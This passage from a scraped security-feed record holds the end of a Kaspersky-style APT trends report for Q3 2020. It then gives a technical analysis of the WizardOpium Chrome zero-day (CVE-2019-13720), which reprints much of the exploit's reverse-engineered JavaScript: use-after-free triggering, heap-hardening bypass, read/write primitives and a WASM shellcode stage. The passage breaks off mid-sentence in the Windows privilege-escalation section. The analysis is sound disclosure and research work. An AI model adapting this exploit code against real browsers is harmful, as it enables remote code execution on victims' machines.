component and saw the use of the USBWorm component for the first time; we also found [an Android implant used to target military personnel in India](<https://securelist.com/transparent-tribe-part-2/98233/>). This discovery also confirms much of the information already discovered during previous investigations; and it also confirms that CrimsonRAT is still under active development.\n\nIn April, we discovered a new malware strain that we named CRAT, based on the build path and internal file name. The malware was spread using a weaponized Hangul document as well as a Trojanized application and strategic web compromise. Since its discovery the full-featured backdoor has quickly evolved, diversifying into several components. 
A downloader delivers CRAT to profile victims, followed by next-stage orchestrator malware named SecondCrat: this orchestrator loads various plugins for espionage, including keylogging, screen capturing and clipboard stealing. During our investigation, we found several weak connections with ScarCruft and Lazarus: we discovered that several debugging messages inside the malware have similar patterns to ScarCruft malware, as well as some code patterns and the naming of the Lazarus C2 infrastructure.\n\nIn June, we observed a new set of malicious Android downloaders which, according to our telemetry, have been actively used in the wild since at least December 2019; and have been used in a campaign targeting victims almost exclusively in Pakistan. Its authors used the Kotlin programming language and Firebase messaging system for the downloader, which mimics Chat Lite, Kashmir News Service and other legitimate regional Android applications. A report by the National Telecom & Information Technology Security Board (NTISB) from January describes malware sharing the same C2s and spoofing the same legitimate apps. According to this publication, targets were Pakistani military bodies, and the attackers used WhatsApp messages, SMS, emails and social media as the initial infection vectors. Our own telemetry shows that this malware also spreads through Telegram messenger. The analysis of the initial set of downloaders allowed us to find an additional set of Trojans that we believe are strongly related, as they use the package name mentioned in the downloaders and focus on the same targets. These new samples have strong code similarity with artefacts previously attributed to Origami Elephant.\n\nIn mid-July, we observed a Southeast Asian government organization targeted by an unknown threat actor with a malicious ZIP package containing a multilayered malicious RAR executable package. In one of the incidents, the package was themed around COVID-19 containment. 
We believe that the same organization was probably also the target of a government web server watering-hole, compromised in early July and serving a highly similar malicious LNK. Much like other campaigns against particular countries that we have seen in the past, these adversaries are taking a long-term, multipronged approach to compromising target systems without utilizing zero-day exploits. Notably, another group (probably OceanLotus) used a similar Telegram delivery technique with its malware implants against the same government targets within a month or so of the COVID-19-themed malicious LNK, in addition to its use of Cobalt Strike.\n\nIn May 2020, Kaspersky technologies prevented an attack using a malicious script for Internet Explorer against a South Korean company. Closer analysis revealed that the attack used a previously unknown full chain that consisted of two zero-day exploits: a Remote Code Execution exploit for Internet Explorer and an Elevation of Privilege exploit for Windows. Unlike a previous full chain that we discovered, used in Operation WizardOpium (you can read more [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), the new full chain targeted the latest builds of Windows 10, and our tests demonstrated reliable exploitation of Internet Explorer 11 and Windows 10 build 18363 x64. On June 8, we reported our discoveries to Microsoft, who confirmed the vulnerabilities. At the time of our report, the security team at Microsoft had already prepared a patch for vulnerability CVE-2020-0986 that was used in the zero-day Elevation of Privilege exploit; but before our discovery, the exploitability of this vulnerability had been considered less likely. The patch for CVE-2020-0986 was released on June 9. 
Microsoft assigned CVE-2020-1380 to a use-after-free vulnerability in JScript and the patch for this was released on August 11. We are calling this and related attacks [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). Currently, we are unable to establish a definitive link with any known threat actor, but due to similarities with previously discovered exploits we believe that DarkHotel may be behind this attack.\n\nOn July 22, we came across a suspicious archive file that was uploaded to VirusTotal from an Italian source. The file seemed to be a triage consisting of malicious scripts, access logs, malicious document files and several screenshots related to suspicious file detections from security solutions. After looking into these malicious document files, we identified that they are related to a Lazarus group campaign that we reported in June. This campaign, dubbed DeathNote, targeted the automobile industry and individuals in the academic field using lure documents containing aerospace and defense-related job descriptions. We are confident that these documents are related to a recently reported attack on an Israeli defense company. We have uncovered webshell scripts, C2 server scripts and malicious documents, identified several victims connected to the compromised C2 server, as well as uncovering the method used to access the C2 server.\n\nWe have observed an ongoing Sidewinder campaign that started in February, using five different malware types. The group made changes to its final payloads and continues to target government, diplomatic and military entities using current themes, such as COVID-19, in its spear-phishing efforts. 
While the infection mechanism remains the same as before, including the group's exploit of choice (CVE-2017-1182) and use of the DotNetToJScript tool to deploy the final payloads, we found that the actor also used ZIP archives containing a Microsoft compiled HTML Help file to download the last-stage payload. In addition to the existing .NET-based implant, which we call SystemApp, the threat actor added JS Orchestrator, the Rover/Scout backdoor and modified versions of AsyncRAT and warzoneRAT to its arsenal.\n\n## Other interesting discoveries\n\nAttribution is difficult at the best of times, and sometimes it's not possible at all. While investigating an ongoing campaign, we discovered a new Android implant undergoing development, with no clear link to any previously known Android malware. The malware is able to monitor and steal call logs, SMS, audio, video and non-media files, as well as identifying information about the infected device. It also implements an interesting feature to collect information on network routes and topology obtained using the "traceroute" command as well as using local ARP caches. During this investigation we uncovered a cluster of similar Android infostealer implants, with one example being obfuscated. We also found older Android malware that more closely resembles a backdoor, with traces of it in the wild dating back to August 2019.\n\nIn April, Cisco Talos described the activities of an unknown actor targeting Azerbaijan's government and energy sector using new malware called PoetRAT. In collaboration with Kaspersky ICS CERT, we identified supplementary samples of associated malware and documents with broader targeting of multiple universities, government and industrial organizations as well as entities in the energy sector in Azerbaijan. The campaign started in early November 2019; and the attackers switched off the infrastructure immediately following publication of the Cisco Talos report. 
We observed a small overlap in victimology with Turla, but since there is no technically sound proof of relation between them, and we haven't been able to attribute this new set of activity to any other previously known actor, we named it Obsidian Gargoyle.\n\n## Final thoughts\n\nThe TTPs of some threat actors remain fairly consistent over time (such as using hot topics such as COVID-19 to entice users to download and execute malicious attachments sent in spear-phishing emails), while other groups reinvent themselves, developing new toolsets and widening their scope of activities, for example, to include new platforms. And while some threat actors develop [very sophisticated tools](<https://securelist.com/mosaicregressor/98849/>), for example, the MosaicRegressor UEFI implant, others [have great success](<https://securelist.com/deathstalker-mercenary-triumvirate/98177/>) with basic TTPs. Our regular quarterly reviews are intended to highlight the key developments of APT groups.\n\nHere are the main trends that we've seen in Q3 2020:\n\n * Geo-politics continues to drive the development of many APT campaigns, as seen in recent months in the activities of Transparent Tribe, Sidewinder, Origami Elephant and MosaicRegressor, and in the 'naming and shaming' of various threat actors by the NCSC and the US Department of Justice.\n * Organizations in the financial sector also continue to attract attention: the activities of the mercenary group DeathStalker are a recent example.\n * We continue to observe the use of mobile implants in APT attacks with recent examples including Transparent Tribe and Origami Elephant.\n * While APT threat actors remain active across the globe, recent hotspots of activity have been Southeast Asia, the Middle East and various regions affected by the activities of Chinese-speaking APT groups.\n * Unsurprisingly, we continue to see COVID-19-themed attacks \u2013 this quarter they included WellMess and Sidewinder.\n * Among the most interesting APT 
campaigns this quarter were DeathStalker and MosaicRegressor: the former underlining the fact that APT groups can achieve their aims without developing highly sophisticated tools; the latter representing the leading-edge in malware development.\n\nAs always, we would note that our reports are the product of our visibility into the threat landscape. However, it should be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.", "modified": "2020-11-03T10:00:37", "published": "2020-11-03T10:00:37", "id": "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "href": "https://securelist.com/apt-trends-report-q3-2020/99204/", "type": "securelist", "title": "APT trends report Q3 2020", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-29T22:19:56", "bulletinFamily": "blog", "cvelist": ["CVE-2010-2744", "CVE-2016-7255", "CVE-2019-0859", "CVE-2019-13720", "CVE-2019-1458"], "description": "\n\nBack in October 2019 we detected a classic watering-hole attack on a North Korea-related news site that exploited a chain of Google Chrome and Microsoft Windows zero-days. While we've already published blog posts briefly describing this operation (available [here](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) and [here](<https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/>)), in this blog post we'd like to take a deep technical dive into the exploits and vulnerabilities used in this attack.\n\n## Google Chrome remote code execution exploit\n\nIn the [original blog post](<https://securelist.com/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium/94866/>) we described the exploit loader responsible for initial validation of the target and execution of the next stage JavaScript code containing the full browser exploit. 
The exploit is huge because, besides code, it contains byte arrays with shellcode, a Portable Executable (PE) file and WebAssembly (WASM) module used in the later stages of exploitation. The exploit abused a vulnerability in the WebAudio OfflineAudioContext interface and was targeting two release builds of Google Chrome 76.0.3809.87 and 77.0.3865.75. However, the vulnerability was introduced long before that and much earlier releases with a WebAudio component are also vulnerable. At the time of our discovery the current version of Google Chrome was 78, and while this version was also affected, the exploit did not support it and had a number of checks to ensure that it would only be executed on affected versions to prevent crashes. After our report, the vulnerability was assigned CVE-2019-13720 and was fixed in version 78.0.3904.87 with the following [commit](<https://chromium.googlesource.com/chromium/src.git/+/6a2e670a243b815cf043f8da4d26ecb9a64d307b>). A use-after-free (UAF) vulnerability, it could be triggered due to a race condition between the Render and Audio threads:\n \n \n if (!buffer) {\n +\tBaseAudioContext::GraphAutoLocker context_locker(Context());\n +\tMutexLocker locker(process_lock_);\n \treverb_.reset();\n \tshared_buffer_ = nullptr;\n \treturn;\n\nAs you can see, when the audio buffer is set to null in ConvolverNode and an active buffer already exists within the Reverb object, the function SetBuffer() can destroy reverb_ and shared_buffer_ objects.\n \n \n class MODULES_EXPORT ConvolverHandler final : public AudioHandler {\n ...\n std::unique_ptr<Reverb> reverb_;\n std::unique_ptr<SharedAudioBuffer> shared_buffer_;\n ...\n\nThese objects might still be in use by the Render thread because there is no proper synchronization between the two threads in the code. 
A patch added two missing locks (graph lock and process lock) for when the buffer is nullified.\n\nThe exploit code was obfuscated, but we were able to fully reverse engineer it and reveal all the small details. By looking at the code, we can see the author of the exploit has excellent knowledge of the internals of specific Google Chrome components, especially the [PartitionAlloc](<https://github.com/scrapy/base-chromium/blob/master/allocator/partition_allocator/PartitionAlloc.md>) memory allocator. This can clearly be seen from the snippets of reverse engineered code below. These functions are used in the exploit to retrieve useful information from internal structures of the allocator, including: SuperPage address, PartitionPage address by index inside the SuperPage, the index of the used PartitionPage and the address of PartitionPage metadata. All constants are taken from [partition_alloc_constants.h](<https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/partition_alloc_constants.h>):\n \n \n function getSuperPageBase(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet superPageBaseMask = ~superPageOffsetMask;\n \tlet superPageBase = addr & superPageBaseMask;\n \treturn superPageBase;\n }\n \n function getPartitionPageBaseWithinSuperPage(addr, partitionPageIndex) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet partitionPageBase = partitionPageIndex << BigInt(14);\n \tlet finalAddr = superPageBase + partitionPageBase;\n \treturn finalAddr;\n }\n \n function getPartitionPageIndex(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \treturn partitionPageIndex;\n }\n \n function getMetadataAreaBaseFromPartitionSuperPage(addr) {\n \tlet superPageBase = getSuperPageBase(addr);\n \tlet systemPageSize = BigInt(0x1000);\n \treturn superPageBase + systemPageSize;\n }\n \n function 
getPartitionPageMetadataArea(addr) {\n \tlet superPageOffsetMask = (BigInt(1) << BigInt(21)) - BigInt(1);\n \tlet partitionPageIndex = (addr & superPageOffsetMask) >> BigInt(14);\n \tlet pageMetadataSize = BigInt(0x20);\n \tlet partitionPageMetadataPtr = getMetadataAreaBaseFromPartitionSuperPage(addr) + partitionPageIndex * pageMetadataSize;\n \treturn partitionPageMetadataPtr;\n }\n\nIt's interesting that the exploit also uses the relatively new built-in [BigInt](<https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/BigInt>) class to handle 64-bit values; authors usually use their own primitives in exploits.\n\nAt first, the code initiates OfflineAudioContext and creates a huge number of IIRFilterNode objects that are initialized via two float arrays.\n \n \n let gcPreventer = [];\n let iirFilters = [];\n \n function initialSetup() {\n \tlet audioCtx = new OfflineAudioContext(1, 20, 3000);\n \n \tlet feedForward = new Float64Array(2);\n \tlet feedback = new Float64Array(1);\n \n \tfeedback[0] = 1;\n \tfeedForward[0] = 0;\n \tfeedForward[1] = -1;\n \n \tfor (let i = 0; i < 256; i++)\n iirFilters.push(audioCtx.createIIRFilter(feedForward, feedback));\n }\n\nAfter that, the exploit begins the initial stage of exploitation and tries to trigger a UAF bug. For that to work the exploit creates the objects that are needed for the Reverb component. 
It creates another huge OfflineAudioContext object and two ConvolverNode objects \u2013 ScriptProcessorNode to start audio processing and AudioBuffer for the audio channel.\n \n \n async function triggerUaF(doneCb) {\n \tlet audioCtx = new OfflineAudioContext(2, 0x400000, 48000);\n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \tlet scriptNode = audioCtx.createScriptProcessor(0x4000, 1, 1);\n \tlet channelBuffer = audioCtx.createBuffer(1, 1, 48000);\n \n \tconvolver.buffer = channelBuffer;\n \tbufferSource.buffer = channelBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tchannelBuffer.getChannelData(0).fill(0);\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(scriptNode);\n \tscriptNode.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \tscriptNode.onaudioprocess = function(evt) {\n \t\tlet channelDataArray = new Uint32Array(evt.inputBuffer.getChannelData(0).buffer);\n \n \t\tfor (let j = 0; j < channelDataArray.length; j++) {\n \t\tif (j + 1 < channelDataArray.length && channelDataArray[j] != 0 && channelDataArray[j + 1] != 0) {\n \t\t\tlet u64Array = new BigUint64Array(1);\n \t\t\tlet u32Array = new Uint32Array(u64Array.buffer);\n \t\t\tu32Array[0] = channelDataArray[j + 0];\n \t\t\tu32Array[1] = channelDataArray[j + 1];\n \n \t\t\tlet leakedAddr = byteSwapBigInt(u64Array[0]);\n \t\t\tif (leakedAddr >> BigInt(32) > BigInt(0x8000))\n \t\t\tleakedAddr -= BigInt(0x800000000000);\n \t\t\tlet superPageBase = getSuperPageBase(leakedAddr);\n \n \t \t\tif (superPageBase > BigInt(0xFFFFFFFF) && superPageBase < BigInt(0xFFFFFFFFFFFF)) {\n \t\t\tfinished = true;\n \t\t\tevt = null;\n \n \t\t\tbufferSource.disconnect();\n \t\t\tscriptNode.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\tsetTimeout(function() {\n \t\t\tdoneCb(leakedAddr);\n \t\t\t}, 1);\n \n \t\t\treturn;\n \t\t\t}\n \t\t}\n 
\t\t}\n \t};\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (!finished) {\n \t \tfinished = true;\n \t \ttriggerUaF(doneCb);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tconvolver.buffer = null;\n \t\tconvolver.buffer = channelBuffer;\n \t\tawait later(100); // wait 100 milliseconds\n \t}\n };\n\nThis function is executed recursively. It fills the audio channel buffer with zeros, starts rendering offline and at the same time runs a loop that nullifies and resets the channel buffer of the ConvolverNode object and tries to trigger a bug. The exploit uses the later() function to simulate the Sleep function, suspend the current thread and let the Render and Audio threads finish execution right on time:\n \n \n function later(delay) {\n \treturn new Promise(resolve => setTimeout(resolve, delay));\n }\n\nDuring execution the exploit checks if the audio channel buffer contains any data that differs from the previously set zeroes. The existence of such data would mean the UAF was triggered successfully and at this stage the audio channel buffer should contain a leaked pointer.\n\nThe PartitionAlloc memory allocator has a special exploit mitigation that works as follows: when the memory region is freed, it byteswaps the address of the pointer and after that the byteswapped address is added to the FreeList structure. This complicates exploitation because the attempt to dereference such a pointer will crash the process. To bypass this technique the exploit uses the following primitive that simply swaps the pointer back:\n \n \n function byteSwapBigInt(x) {\n \tlet result = BigInt(0);\n \tlet tmp = x;\n \n \tfor (let i = 0; i < 8; i++) {\n \t\tresult = result << BigInt(8);\n \t\tresult += tmp & BigInt(0xFF);\n \t\ttmp = tmp >> BigInt(8);\n \t}\n \n \treturn result;\n }\n\nThe exploit uses the leaked pointer to get the address of the SuperPage structure and verifies it. 
If everything goes to plan, then it should be a raw pointer to a temporary_buffer_ object of the ReverbConvolverStage class that is passed to the callback function _initialUAFCallback_.\n \n \n let sharedAudioCtx;\n let iirFilterFeedforwardAllocationPtr;\n \n function initialUAFCallback(addr) {\n \tsharedAudioCtx = new OfflineAudioContext(1, 1, 3000);\n \n \tlet partitionPageIndexDelta = undefined;\n \tswitch (majorVersion) {\n \t\tcase 77: // 77.0.3865.75\n \t \tpartitionPageIndexDelta = BigInt(-26);\n \tbreak;\n \t\tcase 76: // 76.0.3809.87\n \t\tpartitionPageIndexDelta = BigInt(-25);\n \t \tbreak;\n \t}\n \n \tiirFilterFeedforwardAllocationPtr = getPartitionPageBaseWithinSuperPage(addr, getPartitionPageIndex(addr) + partitionPageIndexDelta) + BigInt(0xFF0);\n \n triggerSecondUAF(byteSwapBigInt(iirFilterFeedforwardAllocationPtr), finalUAFCallback);\n }\n\nThe exploit uses the leaked pointer to get the address of the raw pointer to the _feedforward__ array with the AudioArray<double> type that is present in the IIRProcessor object created with IIRFilterNode. This array should be located in the same SuperPage, but in different versions of Chrome this object is created in different PartitionPages and there is a special code inside initialUAFCallback to handle that.\n\nThe vulnerability is actually triggered not once but twice. After the address of the right object is acquired, the vulnerability is exploited again. This time the exploit uses two AudioBuffer objects of different sizes, and the previously retrieved address is sprayed inside the larger AudioBuffer. 
This function also executes recursively.\n \n \n let floatArray = new Float32Array(10);\n let audioBufferArray1 = [];\n let audioBufferArray2 = [];\n let imageDataArray = [];\n \n async function triggerSecondUAF(addr, doneCb) {\n \tlet counter = 0;\n \tlet numChannels = 1;\n \n \tlet audioCtx = new OfflineAudioContext(1, 0x100000, 48000);\n \n \tlet bufferSource = audioCtx.createBufferSource();\n \tlet convolver = audioCtx.createConvolver();\n \n \tlet bigAudioBuffer = audioCtx.createBuffer(numChannels, 0x100, 48000);\n \tlet smallAudioBuffer = audioCtx.createBuffer(numChannels, 0x2, 48000);\n \n \tsmallAudioBuffer.getChannelData(0).fill(0);\n \n \tfor (let i = 0; i < numChannels; i++) {\n \t\tlet channelDataArray = new BigUint64Array(bigAudioBuffer.getChannelData(i).buffer);\n \t\tchannelDataArray[0] = addr;\n \t}\n \n \tbufferSource.buffer = bigAudioBuffer;\n \tconvolver.buffer = smallAudioBuffer;\n \n \tbufferSource.loop = true;\n \tbufferSource.loopStart = 0;\n \tbufferSource.loopEnd = 1;\n \n \tbufferSource.connect(convolver);\n \tconvolver.connect(audioCtx.destination);\n \n \tbufferSource.start();\n \n \tlet finished = false;\n \n \taudioCtx.startRendering().then(function(buffer) {\n \t\tbuffer = null;\n \n \t\tif (finished) {\n \t\taudioCtx = null;\n \n \t\tsetTimeout(doneCb, 200);\n \t\treturn;\n \t\t} else {\n \t\tfinished = true;\n \n \t\tsetTimeout(function() {\n \t\ttriggerSecondUAF(addr, doneCb);\n \t\t}, 1);\n \t\t}\n \t});\n \n \twhile (!finished) {\n \t\tcounter++;\n \n \t\tconvolver.buffer = null;\n \n \t\tawait later(1); // wait 1 millisecond\n \n \t\tif (finished)\n \t\tbreak;\n \n \t\tfor (let i = 0; i < iirFilters.length; i++) {\n \t\tfloatArray.fill(0);\n \t iirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\t\tfinished = true;\n \n \t \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n \t\taudioBufferArray2.push(audioCtx.createBuffer(1, 1, 10000));\n 
\n \t\t\tbufferSource.disconnect();\n \t\t\tconvolver.disconnect();\n \n \t\t\treturn;\n \t\t}\n \t\t}\n \n \t\tconvolver.buffer = smallAudioBuffer;\n \n \t\tawait later(1); // wait 1 millisecond\n \t}\n }\n\nThis time the exploit uses the function _getFrequencyResponse()_ to check if exploitation was successful. The function creates an array of frequencies that is filled with a Nyquist filter and the source array for the operation is filled with zeroes.\n \n \n void IIRDSPKernel::GetFrequencyResponse(int n_frequencies,\n \tconst float* frequency_hz,\n \tfloat* mag_response,\n \tfloat* phase_response) {\n ...\n Vector<float> frequency(n_frequencies);\n double nyquist = this->Nyquist();\n // Convert from frequency in Hz to normalized frequency (0 -> 1),\n // with 1 equal to the Nyquist frequency.\n for (int k = 0; k < n_frequencies; ++k)\n \tfrequency[k] = frequency_hz[k] / nyquist;\n ...\n\nIf the resulting array contains a value other than **\u03c0**, it means exploitation was successful. If that's the case, the exploit stops its recursion and executes the function _finalUAFCallback_ to allocate the audio channel buffer again and reclaim the previously freed memory. This function also repairs the heap to prevent possible crashes by allocating various objects of different sizes and performing defragmentation of the heap. 
The exploit also creates BigUint64Array, which is used later to create an arbitrary read/write primitive.\n \n \n async function finalUAFCallback() {\n \tfor (let i = 0; i < 256; i++) {\n \t\tfloatArray.fill(0);\n \n \tiirFilters[i].getFrequencyResponse(floatArray, floatArray, floatArray);\n \n \t\tif (floatArray[0] != 3.1415927410125732) {\n \t\tawait collectGargabe();\n \n \t\taudioBufferArray2 = [];\n \n \t\tfor (let j = 0; j < 80; j++)\n \t\taudioBufferArray1.push(sharedAudioCtx.createBuffer(1, 2, 10000));\n \n \t\tiirFilters = new Array(1);\n \t \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < 336; j++)\n \t\t\timageDataArray.push(new ImageData(1, 2));\n \t\timageDataArray = new Array(10);\n \t\tawait collectGargabe();\n \n \t\tfor (let j = 0; j < audioBufferArray1.length; j++) {\n \t\t\tlet auxArray = new BigUint64Array(audioBufferArray1[j].getChannelData(0).buffer);\n \t\t\tif (auxArray[0] != BigInt(0)) {\n \t\t\tkickPayload(auxArray);\n \t\t\treturn;\n \t\t\t}\n \t\t}\n \n \t\treturn;\n \t\t}\n \t}\n }\n\nHeap defragmentation is performed with multiple calls to the improvised _collectGarbage_ function that creates a huge ArrayBuffer in a loop.\n \n \n function collectGargabe() {\n \tlet promise = new Promise(function(cb) {\n \t\tlet arg;\n \t\tfor (let i = 0; i < 400; i++)\n \t\tnew ArrayBuffer(1024 * 1024 * 60).buffer;\n \t\tcb(arg);\n \t});\n \treturn promise;\n }\n\nAfter those steps, the exploit executes the function _kickPayload()_ passing the previously created BigUint64Array containing the raw pointer address of the previously freed AudioArray's data.\n \n \n async function kickPayload(auxArray) {\n \tlet audioCtx = new OfflineAudioContext(1, 1, 3000);\n \tlet partitionPagePtr = getPartitionPageMetadataArea(byteSwapBigInt(auxArray[0]));\n \tauxArray[0] = byteSwapBigInt(partitionPagePtr);\n \tlet i = 0;\n \tdo {\n \t\tgcPreventer.push(new ArrayBuffer(8));\n \t\tif (++i > 0x100000)\n \t\treturn;\n \t} while (auxArray[0] != BigInt(0));\n \tlet 
freelist = new BigUint64Array(new ArrayBuffer(8));\n \tgcPreventer.push(freelist);\n \t...\n\nThe exploit manipulates the PartitionPage metadata of the freed object to achieve the following behavior. If the address of another object is written in BigUint64Array at index zero and if a new 8-byte object is created and the value located at index 0 is read back, then a value located at the previously set address will be read. If something is written at index 0 at this stage, then this value will be written to the previously set address instead.\n \n \n function read64(rwHelper, addr) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array;\n \ttmp.buffer;\n \tgcPreventer.push(tmp);\n \treturn byteSwapBigInt(rwHelper[0]);\n }\n \n function write64(rwHelper, addr, value) {\n \trwHelper[0] = addr;\n \tvar tmp = new BigUint64Array(1);\n \ttmp.buffer;\n \ttmp[0] = value;\n \tgcPreventer.push(tmp);\n }\n\nAfter the building of the arbitrary read/write primitives comes the final stage \u2013 executing the code. The exploit achieves this by using a popular technique that exploits the Web Assembly (WASM) functionality. Google Chrome currently allocates pages for just-in-time (JIT) compiled code with read/write/execute (RWX) privileges and this can be used to overwrite them with shellcode. At first, the exploit initiates a \"dummy\" WASM module and it results in the allocation of memory pages for JIT compiled code.\n \n \n const wasmBuffer = new Uint8Array([...]);\n const wasmBlob = new Blob([wasmBuffer], {\n \ttype: \"application/wasm\"\n });\n \n const wasmUrl = URL.createObjectURL(wasmBlob);\n var wasmFuncA = undefined;\n WebAssembly.instantiateStreaming(fetch(wasmUrl), {}).then(function(result) {\n \twasmFuncA = result.instance.exports.a;\n });\n\nTo execute the exported function _wasmFuncA_, the exploit creates a FileReader object. When this object is initiated with data it creates a FileReaderLoader object internally. 
If you can parse PartitionAlloc allocator structures and know the size of the next object that will be allocated, you can predict which address it will be allocated to. The exploit uses the _getPartitionPageFreeListHeadEntryBySlotSize()_ function with the provided size and gets the address of the next free block that will be allocated by FileReaderLoader.\n \n \n let fileReader = new FileReader;\n let fileReaderLoaderSize = 0x140;\n let fileReaderLoaderPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (!fileReaderLoaderPtr)\n \treturn;\n \n fileReader.readAsArrayBuffer(new Blob([]));\n \n let fileReaderLoaderTestPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, fileReaderLoaderSize);\n if (fileReaderLoaderPtr == fileReaderLoaderTestPtr)\n \treturn;\n\nThe exploit obtains this address twice to find out if the FileReaderLoader object was created and if the exploit can continue execution. 
The exploit sets the exported WASM function to be a callback for a FileReader event (in this case, an onerror callback) and because the FileReader type is derived from EventTargetWithInlineData, it can be used to get the addresses of all its events and the address of the JIT compiled exported WASM function.\n \n \n fileReader.onerror = wasmFuncA;\n \n let fileReaderPtr = read64(freelist, fileReaderLoaderPtr + BigInt(0x10)) - BigInt(0x68);\n \n let vectorPtr = read64(freelist, fileReaderPtr + BigInt(0x28));\n let registeredEventListenerPtr = read64(freelist, vectorPtr);\n let eventListenerPtr = read64(freelist, registeredEventListenerPtr);\n let eventHandlerPtr = read64(freelist, eventListenerPtr + BigInt(0x8));\n let jsFunctionObjPtr = read64(freelist, eventHandlerPtr + BigInt(0x8));\n \n let jsFunctionPtr = read64(freelist, jsFunctionObjPtr) - BigInt(1);\n let sharedFuncInfoPtr = read64(freelist, jsFunctionPtr + BigInt(0x18)) - BigInt(1);\n let wasmExportedFunctionDataPtr = read64(freelist, sharedFuncInfoPtr + BigInt(0x8)) - BigInt(1);\n let wasmInstancePtr = read64(freelist, wasmExportedFunctionDataPtr + BigInt(0x10)) - BigInt(1);\n \n let stubAddrFieldOffset = undefined;\n switch (majorVersion) {\n \tcase 77:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(16);\n \tbreak;\n \tcase 76:\n \t\tstubAddrFieldOffset = BigInt(0x8) * BigInt(17);\n \tbreak\n }\n \n let stubAddr = read64(freelist, wasmInstancePtr + stubAddrFieldOffset);\n\nThe variable stubAddr contains the address of the page with the stub code that jumps to the JIT compiled WASM function. At this stage it's sufficient to overwrite it with shellcode. To do so, the exploit uses the function _getPartitionPageFreeListHeadEntryBySlotSize()_ again to find the next free block of 0x20 bytes, which is the size of the structure for the ArrayBuffer object. 
This object is created when the exploit creates a new audio buffer.\n \n \n let arrayBufferSize = 0x20;\n let arrayBufferPtr = getPartitionPageFreeListHeadEntryBySlotSize(freelist, iirFilterFeedforwardAllocationPtr, arrayBufferSize);\n if (!arrayBufferPtr)\n \treturn;\n \n let audioBuffer = audioCtx.createBuffer(1, 0x400, 6000);\n gcPreventer.push(audioBuffer);\n\nThe exploit uses arbitrary read/write primitives to get the address of the DataHolder class that contains the raw pointer to the data and size of the audio buffer. The exploit overwrites this pointer with stubAddr and sets a huge size.\n \n \n let dataHolderPtr = read64(freelist, arrayBufferPtr + BigInt(0x8));\n \n write64(freelist, dataHolderPtr + BigInt(0x8), stubAddr);\n write64(freelist, dataHolderPtr + BigInt(0x10), BigInt(0xFFFFFFF));\n\nNow all that's needed is to implant a Uint8Array object into the memory of this audio buffer and place shellcode there along with the Portable Executable that will be executed by the shellcode.\n \n \n let payloadArray = new Uint8Array(audioBuffer.getChannelData(0).buffer);\n payloadArray.set(shellcode, 0);\n payloadArray.set(peBinary, shellcode.length);\n\nTo prevent the possibility of a crash the exploit clears the pointer to the top of the FreeList structure used by the PartitionPage.\n \n \n write64(freelist, partitionPagePtr, BigInt(0));\n\nNow, in order to execute the shellcode, it's enough to call the exported WASM function.\n \n \n try {\n \twasmFuncA();\n } catch (e) {}\n\n## Microsoft Windows elevation of privilege exploit\n\nThe shellcode appeared to be a Reflective PE loader for the Portable Executable module that was also present in the exploit. This module mostly consisted of the code to escape Google Chrome's sandbox by exploiting the Windows kernel component win32k for the elevation of privileges and it was also responsible for downloading and executing the actual malware. 
On closer analysis, we found that the exploited vulnerability was in fact a zero-day. We notified the Microsoft Security Response Center and they assigned it CVE-2019-1458 and fixed the vulnerability. The win32k component has something of a bad reputation. It has been present since Windows NT 4.0 and, according to Microsoft, it is responsible for more than 50% of all kernel security bugs. In the last two years alone Kaspersky has found five zero-days in the wild that exploited win32k vulnerabilities. That's quite an interesting statistic considering that since the release of Windows 10, Microsoft has implemented a number of mitigations aimed at complicating exploitation of win32k vulnerabilities and the majority of zero-days that we found exploited versions of Microsoft Windows prior to the release of Windows 10 RS4. The elevation of privilege exploit used in Operation WizardOpium was built to support Windows 7, Windows 10 build 10240 and Windows 10 build 14393. It's also important to note that Google Chrome has a special security feature called [Win32k lockdown](<https://googleprojectzero.blogspot.com/2016/11/breaking-chain.html>). This security feature eliminates the whole win32k attack surface by disabling access to win32k syscalls from inside Chrome processes. Unfortunately, Win32k lockdown is only supported on machines running Windows 10. So, it's fair to assume that Operation WizardOpium targeted users running Windows 7.\n\nCVE-2019-1458 is an Arbitrary Pointer Dereference vulnerability. In win32k, Window objects are represented by a tagWND structure. There are also a number of classes based on this structure: ScrollBar, Menu, Listbox, Switch and many others. The FNID field of the tagWND structure is used to distinguish the type of 